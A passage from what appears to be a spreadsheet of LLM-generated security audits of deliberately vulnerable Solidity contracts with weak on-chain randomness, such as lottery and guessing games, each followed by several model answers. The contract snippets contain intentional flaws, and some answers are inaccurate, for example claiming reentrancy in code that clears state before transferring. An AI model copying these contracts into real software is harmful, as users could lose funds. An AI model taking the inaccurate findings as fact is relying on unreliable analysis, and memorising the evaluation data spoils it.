   - The `endRaffle` function leads to potential fund theft or denial-of-service due to a reentrancy attack.
4. **The potential solutions of this vulnerabilities:**
   - **For Reentrancy Attack**:
     1. Use the Checks-Effects-Interactions pattern. This means you should make all the checks (e.g., verifying the sender, any conditions required before executing the function) first, then make any state changes, and finally, interact with other contracts or transfer ethers.
     2. Move the ether transfer outside of the loop. Instead of transferring ethers inside the loop for each contestant, you can accumulate the total ether to be transferred for a contestant and then transfer it in one go after the loop.
     3. Use a reentrancy guard, a modifier that will prevent a function from being re-entered while a previous call is still executing.
Note: Always consult with a Solidity expert or conduct a thorough audit of your smart contract before deploying it on the main network.</t>
  </si>
  <si>
    <t>1. Are there any bad randomness vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
- The function `endRaffle` does not appear to have any explicit randomness generation mechanism, but it's using block properties (like `block.number`) which can potentially be influenced by miners. Miners can manipulate the order of transactions within a block, or even exclude certain transactions, which can affect the outcome of functions relying on block properties.
- The function allows the `feeAddress` to end the raffle without any genuine randomness to determine winners, hence it's open to manipulation.
- Sending Ether (`contestants[i].addr.transfer(pricePerTicket)`) within a loop can be problematic as it could run out of gas if there are many contestants, leading to incomplete execution of the function. This is not a randomness issue, but it's still a vulnerability.
3. The business impact of these vulnerabilities in one sentence:
**Lack of genuine randomness and potential miner influence leads to unfair raffle results.**
4. The potential solutions to these vulnerabilities:
- Introduce a genuine source of randomness for the raffle. The randomness should be generated off-chain and then verified on-chain to ensure it cannot be tampered with.
- Avoid using block properties like `block.number` as they can be influenced by miners.
- Instead of ending the raffle based on the `feeAddress`, consider a more decentralized mechanism or use a multi-signature system to ensure no single entity can manipulate the raffle.
- Instead of sending Ether within a loop, consider using a withdrawal pattern where users can claim their winnings. This avoids the potential pitfalls of running out of gas in the middle of the function.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/guess_the_random_number.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function GuessTheRandomNumberChallenge() public payable {
        require(msg.value == 1 ether);
        answer = uint8(keccak256(block.blockhash(block.number - 1), now));
    }</t>
  </si>
  <si>
    <t>Let me first review the provided Solidity code to determine if there are any vulnerabilities.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability lies in the way the contract generates its "random" number. The line:
```solidity
answer = uint8(keccak256(block.blockhash(block.number - 1), now));
```
generates the random number using the hash of the previous block and the current time (`now`). Both of these values can be accessed or influenced by miners, which makes the randomness predictable and exploitable. 
3. The business impact of these vulnerabilities in one sentence: 
Predictable randomness leads to potential fund theft by guessing the number correctly every time.
4. The potential solutions of these vulnerabilities:
- Avoid relying solely on `block.blockhash` and `now` for generating random numbers in smart contracts, as they can be influenced or known by miners.
- Use an external source of randomness, like Chainlink VRF or a commit-reveal scheme.
- Instead of a single transaction mechanism, implement a two-phase commit-reveal mechanism where users first commit their answer and then reveal it in a later transaction.
- If randomness is essential, consider using off-chain solutions or oracles to generate and supply randomness, but ensure the oracle itself is trustless and secure.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
   **Yes.**
2. how this vulnerability can be exploited :
   a. The use of `now` (alias for `block.timestamp`) can be manipulated to a certain degree by miners. 
   b. The use of `block.blockhash(block.number - 1)` is predictable because once the block is mined, its hash is publicly available.
   c. Combining a predictable value with a slightly manipulatable one makes the generated `answer` less random than intended.
3. The business impact of these vulnerabilities in one sentence:
   Predictable and manipulatable randomness in the `GuessTheRandomNumberChallenge` function leads to potential cheating by users or miners.
4. The potential solutions of this vulnerabilities:
   a. Remove the use of `now` (or `block.timestamp`) to derive randomness.
   b. Don't use the blockhash of the most recent block (`block.number - 1`) for critical randomness. 
   c. Consider using external sources of randomness like Chainlink VRF (Verifiable Random Function) or commit-reveal schemes, although these solutions also come with their own sets of challenges and trade-offs.</t>
  </si>
  <si>
    <t>First, I'll read the uploaded Solidity code to understand its functionality and structure.
The Solidity code appears to be a contract for a game where users guess a random number. Let's analyze the code:
1. The contract `GuessTheRandomNumberChallenge` has an `answer` variable, which stores the "random" number users are trying to guess.
2. In the constructor `GuessTheRandomNumberChallenge()`, the contract requires that exactly 1 ether is sent to play the game. The `answer` is then generated based on a keccak256 hash of the previous block's hash and the current timestamp (`now`).
3. The function `isComplete()` checks if the game has ended, which is when the contract's balance reaches 0.
4. The `guess()` function allows users to guess the random number by sending 1 ether. If their guess is correct, they receive 2 ether.
Now, let's answer the questions:
1. **Are there any bad randomness vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The line:
   \[
   \text{answer = uint8(keccak256(block.blockhash(block.number - 1), now));}
   \]
   uses `block.blockhash(block.number - 1)` and `now` (which is an alias for `block.timestamp`) to generate the random number. Both of these values can be influenced or known by miners. A miner could manipulate the block's timestamp or choose not to publish a block to influence the outcome. Moreover, since the randomness is based on the previous block's hash, anyone can observe this hash before interacting with the contract.
3. **The business impact of these vulnerabilities in one sentence:**
   Predictable randomness in the `GuessTheRandomNumberChallenge` function leads to potential manipulation, allowing attackers to win the game consistently.
4. **The potential solutions to this vulnerability:**
   - Do not rely solely on block data and timestamps for generating random numbers.
   - Introduce external randomness sources such as oracles, but keep in mind that they have their own set of potential vulnerabilities and trust issues.
   - Use a commit-reveal scheme, where users first commit their guess (in a hashed form) and then reveal it later. This prevents them from using the blockhash to their advantage.
   - Make the game a multi-round game, where several rounds of input are required before a winner is determined. This makes it more difficult (though not impossible) for a miner to manipulate the outcome.</t>
  </si>
  <si>
    <t>1. **Are there any bad randomness vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   - The value of `block.blockhash(block.number - 1)` can be accessed by any Ethereum node and therefore can be known by a participant before they interact with the contract.
   - The usage of `now` (which is an alias for `block.timestamp`) introduces another vulnerability. Miners have some leeway in setting the block timestamp, which means they can manipulate the outcome to some extent.
3. **The business impact of these vulnerabilities in one sentence:**
   Predictable randomness in the `GuessTheRandomNumberChallenge` function leads to potential manipulation by miners or participants.
4. **The potential solutions to these vulnerabilities:**
   - Do not rely solely on block data for randomness. Combine multiple sources of entropy.
   - Consider using a commit-reveal scheme, where users first commit to their action without revealing it, and then reveal it in a later transaction. This can help in mitigating miner manipulation.
   - Alternatively, use an external source of randomness like Chainlink VRF (Verifiable Random Function) or other oracle-based solutions to get provably fair randomness.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/lottery.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function makeBet() {
         // Won if block number is even
         // (note: this is a terrible source of randomness, please don't use this with real money)
         bool won = (block.number % 2) == 0;
         // Record the bet with an event
         bets.push(Bet(msg.value, block.number, won));
         // Payout if the user won, otherwise take their money
         if(won) {
             if(!msg.sender.send(msg.value)) {
                 // Return ether to sender
                 throw;
             }
         }
     }</t>
  </si>
  <si>
    <t>I'll begin by reviewing the content of the provided Solidity file `lottery.sol`.
Here's a brief review of the provided code:
This is a basic Solidity contract representing a lottery. Here are the main functions and their purposes:
1. `Lottery()`: This is the constructor that sets the contract creator as the organizer.
2. `makeBet()`: This function allows users to make a bet. The bet's outcome (win/lose) is determined based on whether the current block number is even. If the user wins, they are refunded their bet amount.
3. `getBets()`: This function, accessible only by the organizer, allows the organizer to view all bets that have been made.
4. `destroy()`: This function allows the organizer to self-destruct the contract, sending all the contract's Ether to the organizer.
Let's analyze the code for vulnerabilities:
1. **Are there any vulnerabilities?** 
    Yes.
2. **how this vulnerability can be exploited :**
    - The method of determining a win in the `makeBet()` function is predictable and not truly random. Since it's based on the block number, anyone can simply observe the current block number and decide whether to place a bet based on the odds of the next block number being even or odd. This can be exploited by malicious actors to ensure they always win.
    - The `destroy()` function allows the organizer to self-destruct the contract at any time, taking all the funds with them. This can be abused by the organizer after accumulating a significant amount of Ether.
    - The contract uses the `throw` statement, which is now considered outdated and can consume all provided gas. The newer `revert()` or `require()` statements should be used instead.
3. **The business impact of these vulnerabilities in one sentence:**
    - Predictable win condition allows malicious actors to always win, leading to potential losses for genuine participants.
    - The ability for the organizer to arbitrarily destroy the contract and take all funds jeopardizes the trustworthiness of the contract and can lead to financial losses for participants.
    - Use of outdated error handling can result in unexpected gas consumption for users.
4. **The potential solutions of these vulnerabilities:**
    - Replace the current win condition logic with a more secure and unpredictable source of randomness. For example, use a commit-reveal scheme combined with the block hash.
    - Remove the `destroy()` function or ensure that any remaining funds are returned to participants before contract destruction.
    - Replace `throw` with the more modern `revert()` or `require()` statements to handle errors in a more gas-efficient manner.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The function uses `block.number` as a source of randomness. Miners can (and will) manipulate block numbers if it is profitable for them.
- The function uses the old `throw` method for error handling which consumes all the gas sent to the function if an error occurs.
- It does not have any access control, meaning anyone can call this function.
- The function potentially sends twice the amount of `msg.value` without checking the contract's balance.
3. The business impact of these vulnerabilities:
- Using `block.number` as a randomness source leads to predictable bets.
- Using `throw` can lead to a significant waste of gas.
- Lack of access control allows any user to misuse the contract.
- Sending more Ether than the contract's balance can lead to failed transactions.
4. The potential solutions of these vulnerabilities:
- **For the randomness issue**: Implement a more secure source of randomness. For example, using a commit-reveal scheme or using Chainlink VRF (Verifiable Random Function) for randomness.
- **For the throw issue**: Replace the old `throw` with the modern `revert()` or `require()` functions.
- **For access control**: If needed, implement a modifier that restricts who can call the `makeBet` function.
- **For the Ether sending issue**: Always check the contract's balance before sending Ether to ensure the contract has enough funds.</t>
  </si>
  <si>
    <t>Let's start by examining the contents of the uploaded Solidity code in the file `lottery.sol`.
Let's analyze the provided Solidity code:
1. **Are there any bad randomness vulnerabilities?**
The code has the following lines:
```solidity
// Won if block number is even
// (note: this is a terrible source of randomness, please don't use this with real money)
bool won = (block.number % 2) == 0;
```
This snippet indicates that the contract determines a bet's outcome based on the block number, specifically whether it is even or not.
Answer to the first question: **Yes**.
2. **how this vulnerability can be exploited :**
Using the block number as a source of randomness is vulnerable to manipulation by miners. A miner who wishes to influence the outcome of the bet can choose to include or exclude a transaction based on whether the next block number will be even or odd.
Lines with the vulnerability:
```solidity
bool won = (block.number % 2) == 0;
```
3. **The business impact of these vulnerabilities in one sentence:**
Using the block number as a randomness source leads to potential manipulation of the bet outcome by miners.
4. **The potential solutions of these vulnerabilities:**
   - Replace the block number-based randomness with a more secure randomness source, such as a commit-reveal scheme or leveraging external oracle services like Chainlink VRF (Verifiable Random Function).
   - Educate users on the potential risks associated with participating in a lottery based on weak randomness.
   - Include clear warnings in the contract about the vulnerabilities if block number-based randomness remains in use.</t>
  </si>
  <si>
    <t>1. Are there any bad randomness vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability arises from the use of `block.number` as a source of randomness. Specifically, the code checks if the block number is even to determine if a bet is won or lost. Since the block number is public knowledge and predictable, it can be manipulated or anticipated by attackers to influence the outcome of bets.
3. The business impact of these vulnerabilities in one sentence:
Relying on predictable block numbers as a source of randomness can allow attackers to exploit the system, leading to potential monetary loss for honest users.
4. The potential solutions to these vulnerabilities:
- Use a more secure source of randomness such as Chainlink VRF (Verifiable Random Function) or commit-reveal schemes.
- Consider off-chain randomness sources combined with cryptographic proofs to ensure that the random value hasn't been tampered with.
- Avoid using block attributes like block number, block timestamp, etc., as they can be manipulated by miners or are predictable.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/lucky_doubler.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function rand(uint max) constant private returns (uint256 result){
        uint256 factor = FACTOR * 100 / max;
        uint256 lastBlockNumber = block.number - 1;
        uint256 hashVal = uint256(block.blockhash(lastBlockNumber));
        return uint256((uint256(hashVal) / factor)) % max;
    }
</t>
  </si>
  <si>
    <t>I'll start by reading and understanding the provided Solidity code. After that, I'll analyze the code for any potential vulnerabilities.
Upon analyzing the code, here's the report:
1. **Are there any vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   - The contract relies on `block.blockhash(lastBlockNumber)` for generating randomness in the `generateRandomNumber` function. This approach is vulnerable to miner manipulation since miners can influence the blockhash by withholding blocks and selectively publishing them.
   - The `join()` function contains a logic where the contract sends back excess Ether to the sender using `msg.sender.send()`. Using `.send()` has a gas limit which can fail silently if the receiver has a fallback function that consumes more than 2300 gas. Additionally, reentrancy attacks can be executed if there are state changes after the `.send()` invocation.
   - The use of `throw` for error handling in functions such as `changeMultiplier` and `changeFee` can consume all the provided gas, which isn't efficient for error handling in newer Solidity versions.
3. **The business impact of these vulnerabilities in one sentence:**
   - Predictable randomness leads to potential fund theft by miners.
   - Silent failures and reentrancy attacks can lead to unexpected behavior and potential loss of funds.
   - Inefficient error handling consumes all provided gas, leading to user dissatisfaction and wasted resources.
4. **The potential solutions of these vulnerabilities:**
   - For generating randomness, it's recommended to use a combination of off-chain and on-chain data or rely on oracles or commit-reveal schemes to ensure that the randomness isn't predictable or manipulable.
   - To prevent reentrancy attacks and silent failures, consider using the Checks-Effects-Interactions pattern. This means you should first perform all checks, then update the contract's state, and finally, interact with other contracts or addresses. Also, consider using the `revert()` function for error handling instead of `throw`, as it doesn't consume all the gas provided and can return an error message.
   - For error handling, consider transitioning to using `require()` or `revert()` statements, which are more gas-efficient compared to `throw`.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- **Predictability**: The `rand` function uses the blockhash of the previous block to generate a random number. Since the blockhash of the last block is publicly available, anyone can predict the output of the `rand` function if they know the value of `max`.
- **Blockhash Age**: The Ethereum protocol only allows access to the last 256 blockhashes. Trying to access a blockhash older than this will return a value of 0, making the random number generation fail.
3. The business impact of these vulnerabilities in one sentence:
- **Predictability**: The `rand` function's predictability allows malicious actors to anticipate the outcome, potentially leading to unfair advantages or manipulations in applications relying on this randomness.
- **Blockhash Age**: If a blockhash older than 256 blocks is used, the randomness generation will fail, potentially causing malfunction in applications relying on this function.
4. The potential solutions to these vulnerabilities:
- **Predictability**:
  - Use an oracle service like Chainlink VRF (Verifiable Random Function) to generate true random numbers.
  - Combine multiple unpredictable sources of entropy, not just blockhash.
- **Blockhash Age**:
  - Ensure that the block number used is not older than 256 blocks from the current block. Check the difference between the current block number and the last block number before fetching the blockhash.
  - Use alternative methods or services for generating randomness if the blockhash is too old.</t>
  </si>
  <si>
    <t>I'll begin by reading and analyzing the provided Solidity code to determine if there are any bad randomness vulnerabilities.
Based on the provided Solidity code for the `LuckyDoubler` contract, I will analyze it for bad randomness vulnerabilities.
1. Are there any bad randomness vulnerabilities?
   Let's examine the code to identify any potential vulnerabilities related to randomness.
From the provided code, I can see the function `rand()` which is supposed to generate a random number:
\[
\text{{function rand(uint max) private returns (uint256 result)}}
\]
\[
\begin{{align*}}
&amp;\text{{uint256 factor = FACTOR * 100 / max;}} \\
&amp;\text{{uint256 lastBlockNumber = block.number - 1;}} \\
&amp;\text{{uint256 hashVal = uint256(block.blockhash(lastBlockNumber));}} \\
&amp;\text{{return uint256((uint256(hashVal) / factor)) % max;}}
\end{{align*}}
\]
This function uses the blockhash of the last block (`lastBlockNumber = block.number - 1`) to generate a random number. This approach is vulnerable for the following reasons:
- Miners have the ability to manipulate the blockhash to some extent by choosing which transactions to include in a block, or by delaying the mining of a block.
- If someone can predict which transactions will be included in a block, they might be able to predict the blockhash.
Answering your specific questions:
1. **Are there any bad randomness vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   An attacker, particularly a miner, could manipulate or have knowledge of the upcoming blockhash, thus influencing the outcome of the `rand()` function. This could allow the attacker to have an unfair advantage in the game, predicting or even deciding the payout order.
3. **The business impact of these vulnerabilities in one sentence:**
   The `rand()` function's predictability leads to potential manipulation of payout order, undermining the fairness of the game and potentially leading to financial losses for participants.
4. **The potential solutions of this vulnerabilities:**
   - Use a commit-reveal scheme: This requires participants to first send a hash of their secret number and then reveal it later. The revealed numbers are then combined to generate a random number.
   - Use an external oracle to generate randomness. There are several Ethereum services that provide randomness for contracts. However, this introduces a trust requirement in the oracle.
   - Use the blockhash in combination with other unpredictable values (like participant addresses or the current timestamp) to increase the unpredictability. However, this is still not entirely safe from miner manipulation. 
It's important to note that generating true randomness on the blockchain is a challenging problem, and solutions should be chosen based on the specific requirements and threat model of the application.</t>
  </si>
  <si>
    <t>1. **Are there any bad randomness vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :** 
   The `rand` function relies on the `blockhash` of the last block for its randomness source. This poses multiple vulnerabilities:
   a. **Blockhash Predictability**: Miners, especially those with a significant fraction of the total mining power, can potentially manipulate the outcome of the randomness by withholding or strategically publishing blocks.
   b. **Blockhash Staleness**: `block.blockhash()` is only valid for the last 256 blocks. After that, it will always return zero, which means the randomness will be entirely predictable after this point.
3. **The business impact of these vulnerabilities in one sentence:** 
   The reliance on `blockhash` for randomness allows miners to manipulate outcomes, potentially leading to fraudulent activities or predictable results.
4. **The potential solutions to these vulnerabilities:** 
   a. **Use External Randomness Sources**: Integrate with external services like Chainlink VRF (Verifiable Random Function) or similar decentralized oracles which are designed to provide randomness in a secure manner.
   b. **Commit-Reveal Scheme**: Implement a two-step commit-reveal scheme where users first commit to a number, then later reveal it. The combination of multiple user-committed numbers can serve as a seed for randomness.
   c. **Avoid On-Chain Randomness**: If possible, move the randomness generation off-chain or use it in a context where true randomness isn't critical. 
   d. **Fallback Mechanisms**: If sticking with `blockhash` as a source, have a fallback mechanism for when the block number is too old (more than 256 blocks ago) to prevent the function from returning predictable values. 
Note: When designing smart contracts, especially those dealing with financial transactions or any form of rewards, ensuring secure and fair randomness is crucial.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/old_blockhash.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function settle() public {
        require(block.number &gt; guesses[msg.sender].block);
        bytes32 answer = blockhash(guesses[msg.sender].block);
        guesses[msg.sender].block = 0;
        if (guesses[msg.sender].guess == answer) {
            msg.sender.transfer(2 ether);
        }
    }</t>
  </si>
  <si>
    <t>I will read the provided code and analyze it for any vulnerabilities.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The vulnerability lies in the use of the `blockhash` function. While it might seem like guessing a block hash has a \(1/2^{256}\) chance, the `blockhash` function will return zero for block numbers that are more than 256 blocks ago. This means an attacker can lock in a guess of zero and then simply wait for more than 256 blocks to pass before calling the `settle` function. The `settle` function will then compare their guess of zero with the result of `blockhash`, which will also be zero, and the attacker will win the 2 ether.
3. The business impact of these vulnerabilities in one sentence:
- **The misuse of the `blockhash` function leads to a predictable outcome, allowing attackers to easily win the lottery.**
4. The potential solutions to these vulnerabilities:
- Implement a check in the `settle` function to ensure that no more than 256 blocks have passed since the guess was locked in. If more than 256 blocks have passed, the function should revert or not allow the transfer of ether.
- Consider using a different mechanism for randomness that is not predictable or gameable. Using off-chain solutions or commit-reveal schemes might be more appropriate for such use cases.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
   - **Blockhash Age Limit**: The `blockhash` function only works for the 256 most recent blocks, excluding the current one. This means that if a user calls the `settle` function after more than 256 blocks have passed since their guess, the `blockhash` function will return 0. This can be exploited by a malicious actor if they guess a value of 0.
   - **Reentrancy Attack**: The function transfers ether to `msg.sender` without first ensuring all state changes have been made. If the `msg.sender` is a malicious contract, it can call the `settle` function again before the first call has finished, potentially allowing them to drain the contract of funds.
3. The business impact of these vulnerabilities in one sentence:
   - **Blockhash Age Limit**: Users can exploit the age limit of `blockhash` to win rewards with a fake guess.
   - **Reentrancy Attack**: Malicious actors can drain the funds of the contract.
4. The potential solutions of these vulnerabilities:
   - **Blockhash Age Limit**:
     1. Add a check to ensure the `settle` function is called within 256 blocks of the user's guess.
     2. If not called within this time frame, the guess is invalidated and the user doesn't win any reward.
   - **Reentrancy Attack**:
     1. Implement a locking mechanism so that `settle` cannot be called recursively.
     2. Always make state changes before transferring ether, or use the checks-effects-interactions pattern. For example, set `guesses[msg.sender].block = 0;` before transferring ether.
     3. Consider using the reentrancyGuard modifier provided by OpenZeppelin to prevent recursive calls.</t>
  </si>
  <si>
    <t>Let's start by examining the provided Solidity code to understand its functionality and look for potential vulnerabilities related to bad randomness.
1. Are there any bad randomness vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
The vulnerability in the code is related to the use of the `blockhash` function. The comment at the beginning of the code explains this:
``` 
//Note that while it seems to have a 1/2^256 chance you guess the right hash, actually blockhash returns zero for blocks numbers that are more than 256 blocks ago so you can guess zero and wait.
```
The `blockhash` function returns the hash of the specified block number. However, it returns zero for block numbers that are more than 256 blocks ago. In the `settle` function, the code checks if the stored guess for the user matches the blockhash of the block number they stored. If a user locks in a guess of zero and waits for more than 256 blocks before calling `settle`, they will always win because `blockhash` will return zero.
Lines with vulnerability:
``` 
bytes32 answer = blockhash(guesses[msg.sender].block);
```
in the `settle` function.
3. The business impact of these vulnerabilities in one sentence:
The misuse of the `blockhash` function leads to predictable outcomes and potential loss of ether.
4. The potential solutions to this vulnerability:
- Implement a check to ensure that the `settle` function can only be called within 256 blocks of the user's guess.
- Use an external source of randomness, like Chainlink VRF, which provides verifiable random numbers for smart contracts.
- Make sure the contract logic does not rely solely on `blockhash` for randomness, as it can be manipulated and is predictable after 256 blocks.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
   - The code uses `blockhash()` for randomness. The `blockhash()` function returns the hash of the given block number. However, miners have the ability to influence the result for the last block they mined. Thus, a miner can manipulate the outcome by choosing which transactions to include and which to exclude.
   - The code uses the `block.number` to check if the block has already been mined (i.e., `block.number &gt; guesses[msg.sender].block`). This could allow for potential manipulation.
3. The business impact of these vulnerabilities in one sentence:
   - The reliance on `blockhash()` for randomness leads to potential manipulation by miners, endangering the fairness and security of the contract's payout mechanism.
4. The potential solutions to these vulnerabilities:
   - Use an external source of randomness like Chainlink VRF (Verifiable Random Function) which provides a provably-fair and verifiable source of randomness.
   - Introduce a commit-reveal scheme where users first commit their guess and then reveal it later on, making it harder for miners to manipulate the outcome.
   - Incorporate a longer waiting period (more than one block) to decrease the potential influence of a single miner.
   - Use other on-chain sources of entropy combined with off-chain sources to reduce the possibility of manipulation.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/random_number_generator.sol</t>
  </si>
  <si>
    <t>pragma solidity ^0.4.25;
contract RandomNumberGenerator {
  uint256 private salt =  block.timestamp;
  function random(uint max) view private returns (uint256 result) {
    // Get the best seed for randomness
    uint256 x = salt * 100 / max;
    uint256 y = salt * block.number / (salt % 5);
    uint256 seed = block.number / 3 + (salt % 300) + y;
    uint256 h = uint256(blockhash(seed));
    // Random number between 1 and max
    return uint256((h / x)) % max + 1;
  }
}</t>
  </si>
  <si>
    <t>Let's start by reading and examining the provided Solidity code to understand its functionality and potential vulnerabilities.
Thank you for sharing the code. Here's a summary of the Solidity code:
The code is for a contract named `RandomNumberGenerator`. This contract aims to generate a random number with the help of a function named `random`. The randomness relies on various factors, including the current block number, the block's hash, and a private variable `salt` which is initialized with the current block timestamp.
Analysis:
1. **Are there any vulnerabilities?** 
   - Yes.
2. **how this vulnerability can be exploited :** 
   - The use of `block.timestamp` (or `now`) for `salt` can be manipulated to a certain degree by miners.
   - The use of `block.number` and `blockhash` for randomness can also be influenced by miners. Especially, the `blockhash` function only works for the 256 most recent blocks; any other value will return zeros. If `seed` falls outside this range, the result will be predictable.
   - The function `random` is marked `private`, which means it's not directly callable from outside the contract. However, if there are other functions in the full contract (which aren't shown here) that use this function, they might expose the randomness, making it vulnerable.
3. **The business impact of these vulnerabilities in one sentence:** 
   - The use of predictable variables and reliance on block properties leads to potentially manipulable and insecure randomness.
4. **The potential solutions to these vulnerabilities:**
   - Avoid using `block.timestamp` and `blockhash` as primary sources of randomness. Instead, consider using a combination of off-chain and on-chain sources to generate truly random numbers.
   - If the contract relies heavily on randomness (e.g., for lotteries or games), consider using a trusted oracle or third-party service to generate and provide random numbers.
   - Ensure that the functions using the `random` function are secure and do not expose the generated randomness in a way that allows attackers to predict or manipulate it.
Now, let's consider the lines with vulnerabilities:
- The line initializing `salt` with `block.timestamp`.
- The lines inside the `random` function that use `block.timestamp`, `block.number`, and `blockhash`.
Note: This analysis assumes that the provided code is a complete representation of the contract. If there are other parts of the contract not shown here, they might introduce additional vulnerabilities or considerations.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
   - The use of `block.timestamp` (which is equivalent to `now` in older versions) to generate the salt introduces a degree of miner manipulation. A malicious miner could influence the block timestamp to some extent to affect the outcome.
   - The usage of `block.number` and `blockhash(seed)` as a part of the randomness calculation. The `blockhash` function only works for the most recent 256 blocks. After that, it will always return zero. Thus, if `seed` ever refers to a block that's more than 256 blocks old, the function will not provide a truly random number.
   - The randomness formula is deterministic. Given knowledge of the salt and the block, an adversary can compute the random number output.
3. The business impact of these vulnerabilities in one sentence:
   - **Predictable randomness function leads to potential manipulation and exploitation by malicious actors.**
4. The potential solutions of these vulnerabilities:
   - **Avoid relying on block variables** such as `block.timestamp` and `block.number` for randomness, as these can be influenced by miners.
   - **Use an external randomness source** like Chainlink VRF (Verifiable Random Function) which provides provably fair randomness.
   - If you must use on-chain entropy, consider **combining multiple unpredictable values** (e.g., future block hashes, user-provided data combined with future block data).
   - **Avoid using `blockhash` for older blocks** since it will return zero for blocks older than the last 256.
   - **Limit the scope and impact** of any function that relies on the random number to minimize potential harm.</t>
  </si>
  <si>
    <t>Let's first read and examine the contents of the uploaded Solidity file (`random_number_generator.sol`) to understand its logic and check for any bad randomness vulnerabilities.
The uploaded Solidity code defines a contract called `RandomNumberGenerator`. Here's a summary of the code:
1. The contract uses `block.timestamp` as a salt.
2. It has a private function called `random` which takes a parameter `max` and is supposed to return a random number between 1 and `max`.
3. To generate randomness, the function uses a combination of `salt`, `block.number`, and `blockhash`.
Let's answer your questions in the specified format:
1. Are there any bad randomness vulnerabilities?
**Answer**: Yes.
2. how this vulnerability can be exploited :
- **Use of `block.timestamp`**: The `block.timestamp` can be manipulated (within certain limits) by miners.
- **Use of `block.number`**: This is predictable and can be known in advance.
- **Use of `blockhash(seed)`**: The `blockhash` function only works for the 256 most recent blocks, and using it for older blocks will return zero. If the computed `seed` falls outside this range, the randomness breaks down.
3. The business impact of these vulnerabilities in one sentence:
- Using predictable and manipulatable values for generating random numbers in a smart contract **can lead to potential attacks** where adversaries can predict or influence the outcome.
4. The potential solutions to these vulnerabilities:
- **Avoid using `block.timestamp` and `block.number` directly**: These values can be manipulated or are predictable. If these must be used, they should be combined with other sources of entropy.
- **Consider using commit-reveal schemes**: In this approach, users submit their numbers hashed (commit), and once all numbers are submitted, they reveal the original numbers. The combined revealed numbers can then be used to generate randomness.
- **Use external sources of randomness**: Consider using oracles or external services like Chainlink VRF (Verifiable Random Function) to generate provably fair and unpredictable random numbers.
- **Limit the use of `blockhash`**: Ensure that the block number used with `blockhash` is always within the last 256 blocks.</t>
  </si>
  <si>
    <t>1. Are there any bad randomness vulnerabilities? 
**Answer:** Yes.
2. how this vulnerability can be exploited :
   - The `salt` variable is initialized with `block.timestamp`, which is publicly visible and can be influenced by miners to a certain extent.
   - The function uses `block.number` in its calculations. This is predictable and known by everyone.
   - The function uses `blockhash(seed)` to get a hash of a block. However, `blockhash` only works for the 256 most recent blocks, excluding the current block. If `seed` is not within this range, `blockhash` will return 0.
   - The manipulation of these values (`block.timestamp`, `block.number`, and `blockhash`) can be exploited by miners or any smart actor to anticipate the result of the `random` function.
3. The business impact of these vulnerabilities in one sentence:
   - Predictable randomness function leads to potential exploitation in any use-case relying on this randomness (e.g., games, lotteries, etc.).
4. The potential solutions of these vulnerabilities:
   - **Do not rely on on-chain data like `block.timestamp` or `block.number` for randomness.** These values can be influenced or are predictable. 
   - **Use an off-chain source of randomness** and combine it with on-chain data. One popular method is to use oracles or services like Chainlink VRF (Verifiable Random Function) which provides provably-fair randomness.
   - **Consider using commit-reveal schemes**: In this pattern, users first commit a value (hash of their secret + random number) and later reveal their secret. This helps in ensuring that the randomness is contributed by multiple participants, making it harder to predict or manipulate.
   - **Limit the business logic that relies on randomness**: If randomness must be used, try to limit the impact or value at stake that relies on the random output.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/smart_billions.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function calcHashes(uint32 _lastb, uint32 _delta) constant private returns (uint) {
        return( ( uint(block.blockhash(_lastb  )) &amp; 0xFFFFFF )
            | ( ( uint(block.blockhash(_lastb+1)) &amp; 0xFFFFFF ) &lt;&lt; 24 )
            | ( ( uint(block.blockhash(_lastb+2)) &amp; 0xFFFFFF ) &lt;&lt; 48 )
            | ( ( uint(block.blockhash(_lastb+3)) &amp; 0xFFFFFF ) &lt;&lt; 72 )
            | ( ( uint(block.blockhash(_lastb+4)) &amp; 0xFFFFFF ) &lt;&lt; 96 )
            | ( ( uint(block.blockhash(_lastb+5)) &amp; 0xFFFFFF ) &lt;&lt; 120 )
            | ( ( uint(block.blockhash(_lastb+6)) &amp; 0xFFFFFF ) &lt;&lt; 144 )
            | ( ( uint(block.blockhash(_lastb+7)) &amp; 0xFFFFFF ) &lt;&lt; 168 )
            | ( ( uint(block.blockhash(_lastb+8)) &amp; 0xFFFFFF ) &lt;&lt; 192 )
            | ( ( uint(block.blockhash(_lastb+9)) &amp; 0xFFFFFF ) &lt;&lt; 216 )
            | ( ( uint(_delta) / hashesSize) &lt;&lt; 240));
    }</t>
  </si>
  <si>
    <t>First, I'll review the provided Solidity code in the file "smart_billions.sol" to identify any potential vulnerabilities.
Upon initial inspection, the provided Solidity code includes:
- A `SafeMath` library for safe arithmetic operations.
- `ERC20Basic` and `ERC20` interfaces, which define basic ERC-20 token functions.
- A `BasicToken` contract that implements the `ERC20Basic` interface and has some specific functionalities.
Let's continue with the vulnerability analysis in the provided format:
